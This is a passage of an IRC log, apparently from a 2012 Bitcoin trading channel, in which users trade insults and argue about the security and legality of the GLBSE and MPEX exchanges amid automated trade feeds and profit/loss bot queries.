YOU ARE A BUSINESS ASSOCIATE OF THE DEFENDANTS Aug 28 16:16:47 the suit names 60 does. Aug 28 16:16:56 so Aug 28 16:16:59 jesus god. Aug 28 16:17:01 60 does Aug 28 16:17:04 you're irresponsible ffs. Aug 28 16:17:08 not my name Aug 28 16:17:13 yet. Aug 28 16:17:20 at all Aug 28 16:17:43 you don't know the future in this respect, i'm affraid. Aug 28 16:17:56 it'd be a lot better to come clean o n the matter and offer something definite to the glbse users. Aug 28 16:18:01 of don't be so full of shit Aug 28 16:18:06 as it stands right now, at any point in the future you're named and that's that. Aug 28 16:18:34 anyway, i'm going to eat. ttyl. Aug 28 16:18:39 yeah Aug 28 16:18:40 fuck off Aug 28 16:18:44 dickhead Aug 28 16:19:13 spreading FUD like that Aug 28 16:20:06 Luceo: I've better things to do than spend my time making rebuttals to every piece of shit that rolls out of that guy mouth. Aug 28 16:21:46 nefario: Fair enough. I think some of these points are non-points (it's not the duty of the exchange to regulate whether the stocks are fraudulent or become so) Aug 28 16:22:12 sure Aug 28 16:22:14 Dictionary attack, again, is user issue. Aug 28 16:22:24 actually Aug 28 16:22:39 no GLBSE user account has been compromised using this methoed Aug 28 16:22:43 Also, for some reason your Google authentication doesn't work with Blackberry, I always get told my token is invalid. :/ Aug 28 16:22:57 because the users password password was re-used and compromised Aug 28 16:22:58 [GLBSE] [MU] 1 @ 0.38 BTC [-] Aug 28 16:22:59 yes Aug 28 16:23:05 but we can't protect people against themselves Aug 28 16:23:10 [GLBSE] [PPT.A] 1 @ 0.3612 BTC [+] Aug 28 16:23:11 ofc Aug 28 16:23:14 we've also provided 2fa Aug 28 16:23:23 which would prevent even this Aug 28 16:23:28 it's entirely FUD Aug 28 16:23:32 like Aug 28 16:23:33 I'd like to turn that on but the BB client doesnt seem to work Aug 28 16:23:36 Some of what Mircea said isn't logical, and is biased. Aug 28 16:23:39 It works for lastpass :( Aug 28 16:23:41 as though SSL was vulnerable or something Aug 28 16:23:46 I told him this but he just told me to post a comment... Aug 28 16:23:48 usagi: some? Aug 28 16:23:50 damn mircea Aug 28 16:23:53 About half Aug 28 16:23:53 what is hte point of this comparison Aug 28 16:24:02 its not even correct Aug 28 16:24:07 it's about slinging baseless shit at GLBSE Aug 28 16:24:11 its basically a summary of 3 weeks of -assets Aug 28 16:24:14 nothing more Aug 28 16:24:19 Some of it is true, it's true that MPEX requires you to use gpg and encrypt everything. But that does not make mpex secure Aug 28 16:24:20 and attemptig to spread FUD about our security and legal status Aug 28 16:24:23 it makes it difficult to use Aug 28 16:24:29 well, regarding legality Aug 28 16:24:35 you're both operating unregistered stock exchanges Aug 28 16:24:36 so Aug 28 16:24:39 lets just call a spade a spade Aug 28 16:24:43 Legality is another point, what he said is just plain wrong Aug 28 16:24:43 [GLBSE] [FPGAMINING] 4 @ 0.8401 = 3.3604 BTC [-] Aug 28 16:24:43 rg Aug 28 16:24:44 [GLBSE] [FPGAMINING] 4 @ 0.84 = 3.36 BTC [-] Aug 28 16:24:51 actually GLBSE is registering next month Aug 28 16:24:53 in the UK Aug 28 16:24:58 doesnt change the fact that right now Aug 28 16:24:59 its unregistered Aug 28 16:25:00 and so is his Aug 28 16:25:02 I think the main issue he does get right here is under 'Server rooted' Aug 28 16:25:13 brb Aug 28 16:25:16 you dont start serving liquor then get the license Aug 28 16:25:17 :P Aug 28 16:25:26 MPEX doesn't have any wallet running, that is a plus security-wise Aug 28 16:25:27 it's illegal to chew gum in singapore for example. who cares? Will nefario be arrested in singapore for the crime of chewing gum in the UK? Aug 28 16:25:45 Though I'm sure GLBSE has sensible hot wallet limits Aug 28 16:25:46 so you're admitting he is guilty of chewing gum Aug 28 16:25:54 very interesting. Aug 28 16:25:57 Yeah but "so"? Aug 28 16:26:04 It makes mircea's article look like a joke. Aug 28 16:26:08 [GLBSE] [TEEK.PPT] 4 @ 0.0001 = 0.0004 BTC [-] Aug 28 16:26:24 I also pointed out to him that running an unlicensed securities exchange is illegal in the USA. "So?" Aug 28 16:26:29 neither mpex or glbse operate there Aug 28 16:27:06 The US is not going to ask for mircea's extradition any more than greece will Aug 28 16:27:08 [GLBSE] [UDN] 2 @ 0.0999 = 0.1998 BTC [-] Aug 28 16:27:10 [GLBSE] [OBSI.1MHS] 1 @ 0.08000001 BTC [-] Aug 28 16:27:12 [GLBSE] [OBSI.1MHS] 6 @ 0.08 = 0.48 BTC [-] Aug 28 16:27:15 It's a bullshit point. Aug 28 16:27:26 its illegal everywhere Aug 28 16:27:26 And, it's not relevant wrt security Aug 28 16:27:41 The article purports to be a comparison of security and then talks about legality Aug 28 16:27:42 usagi: Depends on your definition of security Aug 28 16:27:45 [GLBSE] [OBSI.1MHS] 4 @ 0.0705 = 0.282 BTC [-] Aug 28 16:27:51 security is legality Aug 28 16:27:53 It's not relevant to network security, it IS relevant to asset security Aug 28 16:27:59 and he says that in the event glbse was shut down there would be a claims process but on mpex it would proceed orderly Aug 28 16:28:01 if something is illegal, it is a threat to its own security Aug 28 16:28:03 he can't say that. Aug 28 16:28:15 There are a number of clear problems with what he's said. Aug 28 16:28:26 So that's how I evaluate it; not credible. Aug 28 16:28:44 [GLBSE] [UDN] 1 @ 0.1 BTC [+] Aug 28 16:28:45 so write your own report Aug 28 16:28:50 Who cares? Aug 28 16:28:53 [GLBSE] [UDN] 1 @ 0.1 BTC [+] Aug 28 16:29:23 you Aug 28 16:29:24 tbh the law regarding most of what we do Aug 28 16:29:29 Is so ridiculously antiquated Aug 28 16:29:36 Registration wouldn't be worth it imo Aug 28 16:29:36 I care to the point that I don't :p Aug 28 16:29:45 I gave it some time and thought Aug 28 16:29:47 That's about it Aug 28 16:30:32 IMO mpex lacks vision and customer support, they have some security, and thats about it. It needs a lot of work. Aug 28 16:30:32 [GLBSE] [BIF.1YR.LOAN] 4 @ 0.92307691 = 3.6923 BTC [+] Aug 28 16:30:33 [GLBSE] [BIF.1YR.LOAN] 1 @ 0.92307692 BTC [+] Aug 28 16:31:07 mpex needs an interface which is user-friendly, and imo should have a free-tier account that can't issue assets Aug 28 16:31:12 and charge the fee only to issuers Aug 28 16:31:29 I dont mind paying the fee, many people will Aug 28 16:32:23 [MPEX] [S.MPOE] 3700 @ 0.00038844 = 1.4372 BTC [+] Aug 28 16:33:29 I'm not sure it's the fee Aug 28 16:33:40 the fee is nothing, I paid 32btc just to issue nyan Aug 28 16:34:17 Doesnt bother issuers, does bother the casual traders who make up a lot of the demand curve on glbse Aug 28 16:34:32 I am not a serious enough trader to spend 20 btc just to get on mpex Aug 28 16:34:36 ^ Aug 28 16:34:39 I am Aug 28 16:34:55 [GLBSE] [PUREMINING] 1 @ 0.0971 BTC [+] Aug 28 16:35:02 [GLBSE] [YABMC] 2 @ 0.13874 = 0.2775 BTC [+] Aug 28 16:35:04 The only assets worth trading are passed thru to glbse Aug 28 16:35:12 and if mircea shuts those down he will lose a lot of business Aug 28 16:35:13 But I think the fee puts people off and herds them towards glbse, paying $200 to join an exchange with only $50k daily volume is a lot Aug 28 16:35:13 [GLBSE] [FPGA.CONTRACT] 1 @ 0.119999 BTC [-] Aug 28 16:35:31 [GLBSE] [DMC] 5 @ 0.0688 = 0.344 BTC [-] Aug 28 16:35:50 Thats another thing, why does he keep saying mpex does more volume in a week than glbse does in a month Aug 28 16:35:58 It's obvious just watching the exchange what is more popular Aug 28 16:36:07 [GLBSE] [ASICMINER] 10 @ 0.10897 = 1.0897 BTC [-] Aug 28 16:36:08 I mean just being in this channel it's obvious Aug 28 16:36:08 [GLBSE] [ASICMINER] 5 @ 0.10898 = 0.5449 BTC [+] Aug 28 16:36:09 [GLBSE] [ASICMINER] 4 @ 0.10899 = 0.436 BTC [+] Aug 28 16:36:10 [GLBSE] [ASICMINER] 50 @ 0.109 = 5.45 BTC [+] Aug 28 16:36:11 [GLBSE] [ASICMINER] 24 @ 0.1099 = 2.6376 BTC [+] Aug 28 16:36:12 [GLBSE] [ASICMINER] 7 @ 0.11 = 0.77 BTC [+] Aug 28 16:36:26 If you list on mpex and don't get a passthry to glbse Aug 28 16:36:30 you made a mistake Aug 28 16:36:43 well mpex is more about puts and calls it seems to me Aug 28 16:36:45 MPEX generally has the higher value transactions Aug 28 16:37:00 I can tell you right now RG I'd triple my investment in your company if it was on GLBSE. As it stands there's extra risk involved, and extra fees because brendio Aug 28 16:37:08 [GLBSE] [DMC] 5 @ 0.0689 = 0.3445 BTC [+] Aug 28 16:37:27 Same with satoshidice, now I don't just have to worry about 1 person I need to worry about 3. Aug 28 16:37:50 And for my extra risk what do I get? I pay more for the security Aug 28 16:37:50 2 now 4 Aug 28 16:38:14 [GLBSE] [UDN] 10 @ 0.1 = 1 BTC [+] Aug 28 16:38:23 [GLBSE] [BDT] 2 @ 1.04 = 2.08 BTC [+] Aug 28 16:39:07 usagi: I would use mpex far more if it had more users and more movement Aug 28 16:39:46 I do like the higher level of security, I just don't see the point in making big holdings there when they're near-impossible to move Aug 28 16:40:02 [GLBSE] [YARR] 2 @ 0.9999 = 1.9998 BTC [-] Aug 28 16:40:03 [GLBSE] [YARR] 2 @ 0.99998989 = 2 BTC [+] Aug 28 16:40:07 usagi: Is YARR going to pay pirate interest if you get it back? Aug 28 16:40:21 Yes Aug 28 16:40:27 Since I noticed there's been no interest in the default period even though pirate said he will pay it Aug 28 16:40:38 We will keep the first 5% and pass thru the rest, about that Aug 28 16:40:39 [GLBSE] [BFLS.RIG] 1 @ 0.9486 BTC [+] Aug 28 16:41:01 But some people want out now, so I'm buying back what I can until the default is obvious Aug 28 16:41:04 [GLBSE] [PUREMINING] 17 @ 0.0971 = 1.6507 BTC [+] Aug 28 16:41:05 Do you think pirate will pay back? Aug 28 16:41:07 or the payback Aug 28 16:41:12 I don't know. Aug 28 16:41:22 He broke his word about paying people back starting last week Aug 28 16:41:35 And today it's tuesday and there's still no real news. Aug 28 16:41:36 rg its basically a summary of 3 weeks of -assets << well apparently it's not a summary, it's me spreading "fud". Aug 28 16:41:38 Yeah he paid a few but nothing near what he should have Aug 28 16:41:42 No news I can repeat in public anyway ;-) Aug 28 16:42:09 usagi: is in on it, get the mob Aug 28 16:42:47 I have sources just like everyone else does. the problem with sources is that they are not always reliable, btchero. Aug 28 16:42:55 The US is not going to ask for mircea's extradition any more than greece will <<< actually, i think i have the legal matters involved with running the exchange pretty well covered. Aug 28 16:42:59 I hear one thing and then the exact opposite from someone else. Aug 28 16:43:24 You think so, but are you sure? Aug 28 16:43:28 and he says that in the event glbse was shut down there would be a claims process but on mpex it would proceed orderly << it just says mpex has a way to give people their proofs and glbse does not. this is true. Aug 28 16:43:33 well I am a commoner, so I only hear the same nohing from pirate over and over Aug 28 16:43:55 mircea_popescu: well Aug 28 16:43:56 No it isn't true mircea. That's the problem/. Aug 28 16:44:00 everyone knows nefario doesnt live in china Aug 28 16:44:07 and if mircea shuts those down he will lose a lot of business << glbse does less than 20% of any of the assets passed througgh. Aug 28 16:44:10 You can't talk about other companies internal procedures like you know, because you don't/ Aug 28 16:44:12 and your site is vuln to exploit Aug 28 16:44:16 if someone found an exploit in GPG Aug 28 16:44:23 your server obviously executes GPG at one point Aug 28 16:44:26 with content from the user Aug 28 16:44:31 so if someone managed to overflow it that way, it'd be owned Aug 28 16:44:48 if the webserver was owned someone could easily change the addresses on it and make people send their coins to them Aug 28 16:44:49 not you Aug 28 16:45:00 terrible wording Aug 28 16:45:03 but you know what i mean Aug 28 16:45:07 You think so, but are you sure? << i've been on the web with thart exact site for > 5 years. Aug 28 16:45:36 Not sure if past performance... or future results.. Aug 28 16:45:49 [MPEX] [S.MPOE] 12026 @ 0.00038838 = 4.6707 BTC [-] Aug 28 16:45:50 [MPEX] [S.MPOE] 24574 @ 0.0003859 = 9.4831 BTC [-] Aug 28 16:46:06 usagi don't weasel out of it. you can't say "o, someone who;'s been at it forever is vulnerable becasue a buncha forum handles that exist since last week say so" Aug 28 16:46:07 Mircea; Let's say I come to you with an IPO proposal with a company that makes 1,000 btc a month. Aug 28 16:46:12 rg : no, not really. what'd they change ? Aug 28 16:46:19 usagi yea... Aug 28 16:46:22 -_- My cat has worked out how to use the mouse... Aug 28 16:46:22 Can you guarantee I'd raise more money listing on MPEX than GLBSE or any other exchange? Aug 28 16:46:24 mircea_popescu: the deposit address Aug 28 16:46:32 usagi this was already proven Aug 28 16:46:34 usagi: i made more on MPEX than GLBSE Aug 28 16:46:35 !ticker s.dice Aug 28 16:46:36 [MPEX:S.DICE] 1day: 0.0034 / 0.0034 / 0.0034 (57763 shares, 196.39 BTC), 30day: 0.0032 / 0.00322876 / 0.0034 (2352963 shares, 7,597.18 BTC) Aug 28 16:46:38 !ticker gsdpt Aug 28 16:46:39 [GLBSE:GSDPT] [Bid: 0.00313] [Ask: 0.0034] [Spread: 0.00027] [Last: 0.0034] [24hVol: 18.6751] [7dAvg: 0.00370643] Aug 28 16:46:40 [GLBSE] [SS] 1 @ 1.6 BTC [-] Aug 28 16:46:50 o wait, glbse conveniently DOESNT LIST ITS VOLUME Aug 28 16:46:57 s.dice made 80%+ of it's money on mpex. Aug 28 16:47:01 Ueah but there are people passing thru mpex to glbse :p Aug 28 16:47:03 glbse did less than one broker. Aug 28 16:47:06 are you nuts ? Aug 28 16:47:12 [GLBSE] [GMVT-BOT] 1 @ 0.171 BTC [+] Aug 28 16:47:14 the whole volume of gsdpt is ~1k Aug 28 16:47:16 dude both services are differemt Aug 28 16:47:21 what's the point of flinging mud Aug 28 16:47:23 [GLBSE] [BDT] 1 @ 1.04 BTC [+] Aug 28 16:47:29 Well see Aug 28 16:47:32 I asked a question. Aug 28 16:47:32 mircea_popescu: the deposit address << what the hell ? how do they change that ? Aug 28 16:47:34 I like both Aug 28 16:47:38 Mircea otoh is flinging mud. Aug 28 16:47:40 mircea_popescu: by owning the box? Aug 28 16:47:46 what's the point of flinging mud << i dunno man. guy comes in here wants to talkabout how mpex is shit Aug 28 16:47:53 he gets what he gets, what do you want from me ? Aug 28 16:48:05 if people wanna talk shit about mepx Aug 28 16:48:08 that's their perogative Aug 28 16:48:18 it doesnt mean you go and print a papr about how the other exchange sucks Aug 28 16:48:18 I asked where I could make more money listing; I didn't even imply that one server was better. But all I hear from you, mircea, is subterfuge. Aug 28 16:48:19 hey, entirely true. Aug 28 16:48:43 usagi i clearly said to you : you make 7.5k on mpex and 1k on glbse. what's not clear about this ? Aug 28 16:48:47 A lot of what you said in your article is just wrong. When you say stuff like you do about glbse shutting down and using a claims process, it makes you look incredibly biased. Aug 28 16:48:55 lol Aug 28 16:48:57 its already biased Aug 28 16:49:01 regardless of the content Aug 28 16:49:06 the fucking owner of the other exchange wrote it Aug 28 16:49:08 again : if glbse goes down there is NO WAY for the user data to be shown in the clear. Aug 28 16:49:09 you guys even bothered reading it? Aug 28 16:49:14 lol suckers Aug 28 16:49:16 ican just sign everyone's stats with THEIR OWN signature Aug 28 16:49:20 and dump the whole thing on p2p Aug 28 16:49:21 You can't say that. Aug 28 16:49:24 do you even grasp what's involved here ? Aug 28 16:49:33 chaang: we're headed for .002 ! Aug 28 16:49:34 Chaang-Noi reading never hurt anyone. Aug 28 16:49:39 So you use gpg? So? Aug 28 16:49:41 seen the btc-e order book? Aug 28 16:49:44 we are level at .0035 Aug 28 16:49:48 GLBSE can just give everyone a snapshot of their portfolio. Aug 28 16:49:50 its been me selling and not buying Aug 28 16:49:53 Heck they can even sign it with GPG Aug 28 16:49:54 stupid pirate... Aug 28 16:49:58 Whats the point of saying that? Aug 28 16:50:00 usagi srsly. if you don't understand gpg and what it does / why it;'s imp[ortant you're not yet qualified to be a party to this discussion. Aug 28 16:50:04 what the fuck dio you mean "so" ? Aug 28 16:50:12 0.003 33129.15654657 99.38746963 Aug 28 16:50:12 It makes no sense :) Aug 28 16:50:16 they can't sign with gpg seeing how they don't have the bloody keys. Aug 28 16:50:17 doh Aug 28 16:50:19 oh wow .003 Aug 28 16:50:19 that wasnt there Aug 28 16:50:19 how do they sign ? Aug 28 16:50:23 there was a large wall at .0034 Aug 28 16:50:24 [GLBSE] [YABMC] 3 @ 0.1389 = 0.4167 BTC [+] Aug 28 16:50:31 im glad i sold my 150k then :) Aug 28 16:50:37 of 250k Aug 28 16:50:39 0.0034 31046.96162527 105.55966952 Aug 28 16:50:41 that's there too Aug 28 16:50:41 The point here is that glbse keeps that information in a different way. You do not NEED to sign it with gpg to make it valid or official. Aug 28 16:50:44 those werent there yesterday Aug 28 16:50:44 damn Aug 28 16:50:51 yesterday someon coulda knocked it right down Aug 28 16:50:53 lol Aug 28 16:50:58 but no ltc traders have any real money Aug 28 16:50:59 yeah i saw that Aug 28 16:51:00 that's why they trade ltc Aug 28 16:51:01 and then did not do it Aug 28 16:51:11 i once had real money... Aug 28 16:51:17 the before time Aug 28 16:51:19 in the long long ago Aug 28 16:51:21 now pirate has it :) Aug 28 16:51:24 [GLBSE] [KRAKEN] 5 @ 0.01 = 0.05 BTC Aug 28 16:51:30 he could still pay Aug 28 16:51:32 usagi if you don't have gpg you're missing out. Aug 28 16:51:38 I have GPG Aug 28 16:51:40 good. Aug 28 16:51:41 yeah i know Aug 28 16:51:41 gpg is a pain in my ass Aug 28 16:51:50 dun hate rg! it's lovely! Aug 28 16:51:52 But I don't see the point of having to manually sign orders with gpg. That's backend stuff. Aug 28 16:51:56 usagi if you quit responding he will go away! Aug 28 16:51:57 gpg is gods gift to people. Aug 28 16:52:02 usagi: if it was signed on the backend Aug 28 16:52:07 it would hav the private key Aug 28 16:52:11 which defeats te whole purpose Aug 28 16:52:12 usagi yes. think for a moment. exchange goes down. Aug 28 16:52:15 what do you do now ? Aug 28 16:52:20 No, not necessarily RG. Aug 28 16:52:20 you have all this user info. what do you do ? Aug 28 16:52:26 i party as i only sell assets not buy them! Aug 28 16:52:29 you get the backup Aug 28 16:52:30 Same thing mpex woudl do Aug 28 16:52:40 you have a backup of mpex mircea_popescu right? Aug 28 16:52:41 nefario no. went down as in, bitcoinica down. forever. Aug 28 16:52:44 [GLBSE] [OBSI.HRPT] 14 @ 0.10499 = 1.4699 BTC [+] Aug 28 16:52:49 you're retarded Aug 28 16:52:54 dude srsly. i'm not the one that's down half the time, stop being silly. Aug 28 16:52:58 bitcoinica had no backups Aug 28 16:53:05 You are saying on one hand that mpex could provide information but on the other hand glbse could not. it just doesn't make sense. Aug 28 16:53:06 glorious. Aug 28 16:53:09 bitcoinica had backups Aug 28 16:53:13 usagi it does make sense. Aug 28 16:53:14 they just had them in the same place as everything else Aug 28 16:53:19 which is the opposite of what you're meant to do Aug 28 16:53:22 The fact that it's signed is not relevant........... Aug 28 16:53:27 [GLBSE] [MOORE] 8 @ 0.5001 = 4.0008 BTC [-] Aug 28 16:53:28 it's just not relevant Aug 28 16:53:28 [GLBSE] [MOORE] 10 @ 0.5 = 5 BTC [-] Aug 28 16:53:29 which is why our backup is in NYC Aug 28 16:53:32 and none of our servers are Aug 28 16:53:33 usagi you're just being silly. Aug 28 16:53:52 do you understand that i can sign the whole database with each account's key and dump it in the open Aug 28 16:53:58 and ONLY THE RIGHT PEOPLE could read it ? Aug 28 16:54:06 this is what gpg does. Aug 28 16:54:13 if all you have is account name/pass you CAN NOT DO THIS Aug 28 16:54:17 And what would the use of that be Aug 28 16:54:18 mircea_popescu: unless your exchange publishes the balance for a user or gives them a signed balance every time a trade happens they can't piece together anything Aug 28 16:54:26 you have to put up a damned webpage going "hai user, pls to reclaim your acct with your pw" Aug 28 16:54:27 If MPEX went down you couldn't do that Aug 28 16:54:30 as in, goes down forever Aug 28 16:54:38 nefario it does exactly that. Aug 28 16:54:42 usagi yes, i could Aug 28 16:54:49 Not if mpex goes down Aug 28 16:54:52 and i actually have measures in place for that to happen. Aug 28 16:54:56 mircea has a contingency plan Aug 28 16:55:00 if mpex goes down the entire thing goes to p2p. Aug 28 16:55:03 even the romanian secret service came and killed him Aug 28 16:55:07 GLBSe has had a disaster plan for months Aug 28 16:55:07 we'd not be fucked Aug 28 16:55:11 but so does glbse Aug 28 16:55:15 so we can stop arguing this point Aug 28 16:55:17 nefario yes, nefario, but IT DEPENDS ON A RECLAIM PROCESS! Aug 28 16:55:22 jesus why is this so hard to grasp. Aug 28 16:55:23 no it doesn't Aug 28 16:55:26 ... Aug 28 16:55:27 So what Aug 28 16:55:31 we've got all the account details Aug 28 16:55:35 and all the BTC Aug 28 16:55:36 SO NOTJHING OTHER THAN THE FACT. for christ. Aug 28 16:55:36 [GLBSE] [TYGRR.BOND-P] 109 @ 0.269 = 29.321 BTC [-] Aug 28 16:55:46 bring up GLBSE - other site Aug 28 16:55:53 people have their accounts back Aug 28 16:55:58 whats so hard about this to understand Aug 28 16:55:58 yes. after they claim it! Aug 28 16:55:59 jesus. Aug 28 16:56:01 not this channel isn't #glbse or #mpex ;) Aug 28 16:56:02 This is like saying MY ORANGES COME FROM SPAIN Aug 28 16:56:04 claim it? Aug 28 16:56:07 as in login? Aug 28 16:56:09 like normal Aug 28 16:56:10 yes. claim it. yes. Aug 28 16:56:13 not = note Aug 28 16:56:19 so they do what they always do then Aug 28 16:56:21 getting sick of all this crap Aug 28 16:56:23 which is logging in Aug 28 16:56:24 so Aug 28 16:56:26 i think everyone should relax Aug 28 16:56:29 so you have no alternative dood. Aug 28 16:56:31 GLBSE users are always claiming their accounts Aug 28 16:56:33 mircea can run his exchange and publish his little papers Aug 28 16:56:34 suppose it's impossible to get them to login Aug 28 16:56:38 and nefario can continue to run his Aug 28 16:56:39 suppose the internet goes down forever. Aug 28 16:56:40 Mircea...... the differe3nce here is that one system uses a password and one system uses a private key as a password Aug 28 16:56:41 and improve it Aug 28 16:56:42 jesus fuck. Aug 28 16:56:43 It's really the same thing. Aug 28 16:56:47 mircea_popescu: why would it be impossible? Aug 28 16:57:02 The joke here is that glbse could do the same thing using user's passwords as keys Aug 28 16:57:15 sigh. i am getting sick of discussing security with people who don't actually know wtf security is. Aug 28 16:57:20 security is an absolute, ladies and gents. Aug 28 16:57:22 it's not a feeling. Aug 28 16:57:25 I have a background in computer security. Aug 28 16:57:30 it doesn't show. Aug 28 16:57:43 Security is not an absolute lol Aug 28 16:57:44 mircea_popescu: security is not an absolute Aug 28 16:57:48 yours isn't. Aug 28 16:57:56 Security is never an absolute Aug 28 16:57:58 it doesn't show, because it is a good background :p Aug 28 16:57:58 that's kind of the point. Aug 28 16:57:58 It's a scale Aug 28 16:58:01 :/ Aug 28 16:58:04 and on that note everyone goodnight Aug 28 16:58:09 night Aug 28 16:58:12 I could design a system more secure than mpex that was easier to use Aug 28 16:58:19 suppose every time you put a site up for ppl to login you get ddos'ed within 30 seconds Aug 28 16:58:19 in my sleep Aug 28 16:58:25 and this goes on for 1k sites over 2 weeks Aug 28 16:58:28 usagi: Do it then :P I'll use it Aug 28 16:58:29 what nao ? o, "it's a scale" Aug 28 16:58:35 I have no time. Aug 28 16:58:36 Luceo it's there. Aug 28 16:58:46 brb Aug 28 16:58:53 usagi i doubt you have better use of your time than to compete with me. Aug 28 16:59:25 stop all this shit Aug 28 16:59:29 everyone grow up Aug 28 16:59:37 yea srsly. Aug 28 16:59:40 go flood the forums Aug 28 16:59:43 this chan wasn't this lively in months. Aug 28 16:59:48 I don't want to compete with you Aug 28 16:59:59 SO how about that Bitcoin price increase Aug 28 17:00:00 [GLBSE] [YABMC] 10 @ 0.1389 = 1.389 BTC [+] Aug 28 17:00:03 ;;ticker Aug 28 17:00:03 Best bid: 10.85, Best ask: 10.8889, Bid-ask spread: 0.03890, Last trade: 10.85, 24 hour volume: 101580, 24 hour low: 10.5, 24 hour high: 11.883 Aug 28 17:00:06 ;;asks 12 Aug 28 17:00:09 There are currently 61844.237 bitcoins offered at or under 12.0 USD, worth 715198.703307 USD in total. Aug 28 17:00:18 ;;market sell 500000 Aug 28 17:00:20 A market order to sell 500000 bitcoins right now would net 1919584.4110 USD and would take the last price down to 1.1500 USD, resulting in an average price of 3.8392 USD/BTC. Aug 28 17:00:31 ;;market buy 500000 Aug 28 17:00:32 This order would exceed the size of the order book. You would buy 165687.65 bitcoins, for a total of 1115166798.0649 USD and take the price to 1000000000.0000. Aug 28 17:00:42 ;;market buy 50000 Aug 28 17:00:44 A market order to buy 50000 bitcoins right now would take 573130.7010 USD and would take the last price up to 12.0000 USD, resulting in an average price of 11.4626 USD/BTC. Aug 28 17:01:28 HEY Aug 28 17:01:31 i told -otc already but Aug 28 17:01:36 i got my casacius coin Aug 28 17:01:37 the one i won Aug 28 17:01:40 wd! Aug 28 17:02:00 the under side is cool Aug 28 17:02:02 but the front seems Aug 28 17:02:03 uninspired Aug 28 17:02:24 it says on the bottom: Aug 28 17:02:27 5 BITCOINS Aug 28 17:02:29 but it looks like Aug 28 17:02:31 SHIT COINS Aug 28 17:02:36 from above Aug 28 17:03:57 [GLBSE] [FDBF] 1 @ 0.1499998 BTC [+] Aug 28 17:04:31 aww Aug 28 17:04:58 [GLBSE] [KRAKEN] 11 @ 0.01 = 0.11 BTC Aug 28 17:05:14 its the silver colourd one? Aug 28 17:05:30 yeah its silver on the front Aug 28 17:05:32 gold on the back Aug 28 17:05:33 yeah Aug 28 17:05:35 what? Aug 28 17:05:38 !help Aug 28 17:05:39 List of commands: Aug 28 17:05:39 !ticker (desc: returns current GLBSE/MPEX ticker values) Aug 28 17:05:41 !pl [@] [] (desc: profit loss calc for GLBSE assets) Aug 28 17:05:41 gold on the back? Aug 28 17:05:54 the holigram you mean? Aug 28 17:05:55 yeh Aug 28 17:05:59 oh Aug 28 17:06:02 well Aug 28 17:06:07 yeah anyway they are cool Aug 28 17:06:08 !pl GSDPT Aug 28 17:06:09 !pl [@] [] Aug 28 17:06:12 i have many :) Aug 28 17:06:16 this dude in here told me about the auction Aug 28 17:06:19 !pl GSDPT 1000 Aug 28 17:06:19 i have atleast one of everything he makes Aug 28 17:06:19 Requesting data from GLBSE (might take a while). Aug 28 17:06:20 kakobrekla does anyone much use the !pl thing ? (by looking at the logs i mean). Aug 28 17:06:21 No dividend payments yet. Aug 28 17:06:30 including the 1000 gold one Aug 28 17:06:30 |}ruid Aug 28 17:06:39 dunno Aug 28 17:06:45 the guy who mailed it to me has the hand writing of a 14 year old Aug 28 17:06:51 just like mine Aug 28 17:06:51 im wondering if i shouldd bother to make a thing for that ? Aug 28 17:07:36 no profit loss calculations if no dividend? strange Aug 28 17:07:45 someone cant code Aug 28 17:07:57 oh wait. Aug 28 17:07:59 lol ? Aug 28 17:08:29 !ticker GSDPT Aug 28 17:08:31 [GLBSE:GSDPT] [Bid: 0.00313] [Ask: 0.0034] [Spread: 0.00027] [Last: 0.0034] [24hVol: 18.6751] [7dAvg: 0.00370643] Aug 28 17:10:38 EB250, maybe ill fix it when i have some time Aug 28 17:11:20 nice bot and good idea for calculations Aug 28 17:11:55 !pl KRAKEN 100 Aug 28 17:11:55 Requesting data from GLBSE (might take a while). Aug 28 17:11:58 No dividend payments yet. Aug 28 17:12:08 stupid ass. Aug 28 17:12:11 !pl FDBF 100 Aug 28 17:12:12 Requesting data from GLBSE (might take a while). Aug 28 17:12:18 No dividend payments yet. Aug 28 17:12:28 damn.. I need one with divs Aug 28 17:12:35 !pl gigamining Aug 28 17:12:36 !pl [@] [] Aug 28 17:12:42 sigh Aug 28 17:12:51 !pl gigamining 100 Aug 28 17:12:52 Requesting data from GLBSE (might take a while). Aug 28 17:13:00 GIGAMINING [1@1BTC] paid: 0.41490096 BTC. Last price: 0.9446 BTC. Capital gain: -99.0554 BTC. Total: -98.64049904 BTC. (-98.6%) Aug 28 17:13:00 100? Aug 28 17:13:16 !pl gigamining 100@1 Aug 28 17:13:17 Requesting data from GLBSE (might take a while). Aug 28 17:13:38 !pl gigamining 1.55 Aug 28 17:13:38 GIGAMINING [100@1BTC] paid: 41.490096 BTC. Last price: 0.9446 BTC. Capital gain: -5.54 BTC. Total: 35.950096 BTC. (36%) Aug 28 17:13:38 Requesting data from GLBSE (might take a while). Aug 28 17:13:41 GIGAMINING [1@1.55BTC] paid: 0.41490096 BTC. Last price: 0.9446 BTC. Capital gain: -0.6054 BTC. Total: -0.19049904 BTC. (-12.3%) Aug 28 17:14:46 can you add this? If no price or number of shares, uses the first trade and 1 share? Aug 28 17:15:03 first trade of giga is 10btc Aug 28 17:15:09 default is 1 share Aug 28 17:15:09 :) Aug 28 17:15:23 ok then Aug 28 17:15:24 [MPEX] [F.GIGA.ETF] 1200 @ 0.00093835 = 1.126 BTC [+] Aug 28 17:15:26 [MPEX] [F.GIGA.ETF] 2852 @ 0.00094838 = 2.7048 BTC [+] Aug 28 17:15:27 [MPEX] [F.GIGA.ETF] 305 @ 0.00095089 = 0.29 BTC [+] Aug 28 17:15:28 [MPEX] [F.GIGA.ETF] 9900 @ 0.00095932 = 9.4973 BTC [+] Aug 28 17:19:40 !pl BITBOND 0.60 2012-04-15 Aug 28 17:19:40 Requesting data from GLBSE (might take a while). Aug 28 17:19:42 BITBOND [1@0.6BTC] (since: 2012-04-15) paid: 0.16611276 BTC. Last price: 0.467 BTC. Capital gain: -0.133 BTC. Total: 0.03311276 BTC. (5.5%) Aug 28 17:24:35 [GLBSE] [DMC] 5 @ 0.061 = 0.305 BTC [-] Aug 28 17:24:37 [GLBSE] [DMC] 5 @ 0.06 = 0.3 BTC [-] Aug 28 17:24:49 [GLBSE] [TEEK.B] 5 @ 0.999 = 4.995 BTC [+] Aug 28 17:26:08 !pl DMC 1 Aug 28 17:26:08 Requesting data from GLBSE (might take a while). Aug 28 17:26:11 DMC [1@1BTC] paid: 0.02635814 BTC. Last price: 0.06 BTC. Capital gain: -0.94 BTC. Total: -0.91364186 BTC. (-91.4%) Aug 28 17:26:41 This has to be the record :) Aug 28 17:26:53 !pl DMC 0.01111111111 Aug 28 17:26:53 Requesting data from 